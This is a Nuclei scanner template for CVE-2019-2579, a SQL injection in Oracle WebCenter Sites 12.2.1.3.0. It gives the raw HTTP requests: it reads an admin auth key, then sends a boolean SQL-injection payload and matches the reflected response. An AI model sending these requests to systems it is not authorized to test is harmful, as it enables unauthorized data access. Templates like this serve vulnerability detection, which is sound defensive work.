62 lines
2.4 KiB
YAML
62 lines
2.4 KiB
YAML
id: CVE-2019-2579
|
|
|
|
info:
|
|
name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection
|
|
author: leovalcante
|
|
severity: medium
|
|
description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
|
|
remediation: |
|
|
Apply the necessary patches or updates provided by Oracle to mitigate the SQL Injection vulnerability.
|
|
reference:
|
|
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
|
|
- https://github.com/Leovalcante/wcs_scanner
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-2579
|
|
- http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 4.3
|
|
cve-id: CVE-2019-2579
|
|
epss-score: 0.00493
|
|
epss-percentile: 0.73488
|
|
cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: oracle
|
|
product: webcenter_sites
|
|
tags: cve,cve2019,oracle,wcs,sqli
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /cs/ContentServer HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+
|
|
|
|
cookie-reuse: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "value='' and '1'='0 --"
|
|
- "Use this utility to view and manage URLs"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: authkey
|
|
group: 1
|
|
regex:
|
|
- "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"
|
|
internal: true
|
|
part: body
|
|
# digest: 4a0a00473045022100c19bdf11186490d10a6edaba4a81738654eab19a03bd242d40a4b88c35972c4002207bc032c0cc57989c56d99e0aca57b88c669398ff3090d65c8caa74afb4e874f6:922c64590222798bb761d5b6d8e72950 |